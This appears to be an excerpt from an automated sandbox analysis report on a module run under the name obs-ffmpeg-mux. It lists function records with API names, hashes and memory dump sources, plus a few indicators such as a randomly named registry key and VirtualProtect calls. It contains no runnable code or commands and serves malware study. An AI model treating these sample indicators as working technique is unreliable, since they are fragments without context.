                                                            • Opcode Fuzzy Hash: 409bc04082ec80ca9a793320c8c1970d6722e4646ad8771e6aff88865e4a4919
                                                            • Instruction Fuzzy Hash: 59811E36B15A1682EB18DF35E875A3E2263EF8C745F818475C90F5ABA5CE3FD0458704

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Timer$FileFind$ConsoleCreateDeleteHandleNextOpenPointProcessQueueTransactedVersionWindow$AllocBandwidthBarrierBoundaryClipboardCommContextCriticalCursorDescriptorDirectoryEnterFirstFocusGlobalHelpLogicalMountOutputPhysicalPropertiesReadRemoveReservationSectionShowStreamSynchronizationTapemarkTitleVirtualVolumeWaitableWrite
                                                            • String ID: x
                                                            • API String ID: 1620229001-618964285
                                                            • Opcode ID: f87dd8e41ce6483989a590ec29bb05b1d62e809659f9fda5e6a0d3ed9b5d3f70
                                                            • Instruction ID: f62ba0327b7a06c29f002e279905e71faf7b29a71741dbd7a71d13607543bad3
                                                            • Opcode Fuzzy Hash: f87dd8e41ce6483989a590ec29bb05b1d62e809659f9fda5e6a0d3ed9b5d3f70
                                                            • Instruction Fuzzy Hash: 54A17C32B0968582EB68CB31E46576F73A2FB88354F808439D68E56F99CF7FD0448B04

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Create$FileQuery$BarrierBitmapBufferCharConsoleCurrentDeleteFiberFindIndirectInitializeMappingMemoryMountNamesNextNotificationPointPrivateProcessProfileResourceScreenSectionSynchronizationUnlockVirtualVolumeWidth
                                                            • String ID:
                                                            • API String ID: 211411654-0
                                                            • Opcode ID: 6d8afccd1d2c080f849b57737f0f17a57049f5d71e49d6924da8063b6094f735
                                                            • Instruction ID: 38120934d8b990806adfbe71e57fb7b5c3bbf60bf54ec0b3c07ed53b76ba7707
                                                            • Opcode Fuzzy Hash: 6d8afccd1d2c080f849b57737f0f17a57049f5d71e49d6924da8063b6094f735
                                                            • Instruction Fuzzy Hash: C7516B32B2965187E754CF39F865B2E77A2FB88304F805136FA8A86B55CF3ED4048B04

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::EmptyQueue::StructuredWork$Create$Char_traitsCloseMutexValue
                                                            • String ID: SOFTWARE\pzruyfrcqocvcuiasjrccsy$qhmninsnzasudnedn$ycsepmubxbtwkolmtv
                                                            • API String ID: 1362858086-771951700
                                                            • Opcode ID: 39f06f3d5dfad09abccc3109071f6f931abc7924bbe5b8c646441f8380735ffc
                                                            • Instruction ID: 5a57badae4f45df306513fef578465e5849820c40069786b4c8c4e12456b37cc
                                                            • Opcode Fuzzy Hash: 39f06f3d5dfad09abccc3109071f6f931abc7924bbe5b8c646441f8380735ffc
                                                            • Instruction Fuzzy Hash: 2651623161EAC1C6EA60DB60F4603AEB362FBC5355F404132E68D92BAADF6DD585CB04

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 190073905-0
                                                            • Opcode ID: 885b1372c4ac6e252af6f8e66040fcee7ecb067237b4b5e5498a149560df340e
                                                            • Instruction ID: 18b6d7957fff0a5d9d64662de1690065986f50d1d9657d6638c914f469adf115
                                                            • Opcode Fuzzy Hash: 885b1372c4ac6e252af6f8e66040fcee7ecb067237b4b5e5498a149560df340e
                                                            • Instruction Fuzzy Hash: 4881D221F0E24742FA50AB35986227A62D3AF85780F5444B9EA0D737D7DF3FE9418308

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID:
                                                            • API String ID: 3000768030-0
                                                            • Opcode ID: 7886f18d25acb83806fc9ae5e0890180e5f85731691ffc7f8f8f9a5d69d29a06
                                                            • Instruction ID: 0b1f78767dd075111b331ae8513d53a58e823c01f356ae0d9b5a66ce8ac94321
                                                            • Opcode Fuzzy Hash: 7886f18d25acb83806fc9ae5e0890180e5f85731691ffc7f8f8f9a5d69d29a06
                                                            • Instruction Fuzzy Hash: 6231DB22B1AB4682E7618F3484A01782652FB45BB0F680779EB7E173E5CF3BE451D305

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_NameName::SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 3936588866-0
                                                            • Opcode ID: 30c079df398d5b2e3d5503d7e36682e68b9a20734315ede24bf96e024609b5c8
                                                            • Instruction ID: 13bc83a492434e595649863eeba81cab75bc1184f1a34f3ede31072adb88d960
                                                            • Opcode Fuzzy Hash: 30c079df398d5b2e3d5503d7e36682e68b9a20734315ede24bf96e024609b5c8
                                                            • Instruction Fuzzy Hash: 7D212A227195C556DA70D615E8613DBB3D2F7C87C0F819931DA8D83B69EE2DCA44CF00

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_NameName::SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 3936588866-0
                                                            • Opcode ID: 48d6e1b7960a9ac3cebdc0c050fdb7a731a13dc49d4e3fd72ce479534f36db21
                                                            • Instruction ID: 169884d101489245491ac3bcca0aa3e1d2d4c88fb5886860a02bdf63fc22c3ae
                                                            • Opcode Fuzzy Hash: 48d6e1b7960a9ac3cebdc0c050fdb7a731a13dc49d4e3fd72ce479534f36db21
                                                            • Instruction Fuzzy Hash: 0E2145627195C456DA70DA15E8603DAA3A3F7C87D0FC18931EACD83B69ED2DCA08CB00

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FFDA379EDA0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379EE16
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379BFF9
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 9049369542d94e38dfe0327c516c39202767922d134a888ab07566f7817e02ff
                                                            • Instruction ID: be8dfa1bf037c804932c0998a60a56df04b6d4273b89b118df6749fd9b1a0b1f
                                                            • Opcode Fuzzy Hash: 9049369542d94e38dfe0327c516c39202767922d134a888ab07566f7817e02ff
                                                            • Instruction Fuzzy Hash: 1921302271AAC495DAA0DB15F45039AB3A2F7C57C0F805431EACD83B69EE3DC554CB00

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FFDA379ECD0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379ED46
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379BD49
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 9ff15d03553d094d4f69d7d0519dcecefb7ec8053f8ff6234af53e769483a8fd
                                                            • Instruction ID: a3079f3b25634d95e25cf217a73bc09abadfdd94be04b5ff785249a7b3bbae64
                                                            • Opcode Fuzzy Hash: 9ff15d03553d094d4f69d7d0519dcecefb7ec8053f8ff6234af53e769483a8fd
                                                            • Instruction Fuzzy Hash: 57211E2271AAC995DAA0DB15F46139BB3A2F7C97C0F805531EACD83B69EE3DC544CB00
                                                            APIs
                                                              • Part of subcall function 00007FFDA379F4F0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379F566
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379CF39
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            APIs
                                                              • Part of subcall function 00007FFDA379F420: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379F496
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379CD79
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            APIs
                                                              • Part of subcall function 00007FFDA379FC20: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379FC96
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379DC39
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            APIs
                                                              • Part of subcall function 00007FFDA379E990: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379EA06
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379B4C6
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            APIs
                                                              • Part of subcall function 00007FFDA379EE70: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379EEE6
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379C1B1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            APIs
                                                              • Part of subcall function 00007FFDA379F010: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379F086
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379C4D1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            APIs
                                                              • Part of subcall function 00007FFDA379FAA0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379FB16
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379DAA1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FFDA37FF345,?,?,?,?,?,00007FFDA37FEE27), ref: 00007FFDA38001B0
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FFDA37FF395,?,?,?,?,?,00007FFDA37FEFA7), ref: 00007FFDA380025D
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B640D
                                                              • Part of subcall function 00007FFDA37C3FC0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C3FEA
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BE65D
                                                              • Part of subcall function 00007FFDA37C9C60: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C9C8A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BA55D
                                                              • Part of subcall function 00007FFDA37C6E40: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C6E6A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B6C2D
                                                              • Part of subcall function 00007FFDA37C4670: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C469A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: fd194588803682c8b35a164ba329f2c5f9a448e601a6379e4138ab21443ebc00
                                                            • Instruction ID: 154df1f68aa5382c657e2f88596b1a3ec88ed5de5c932ff03f7b6faeee8fe637
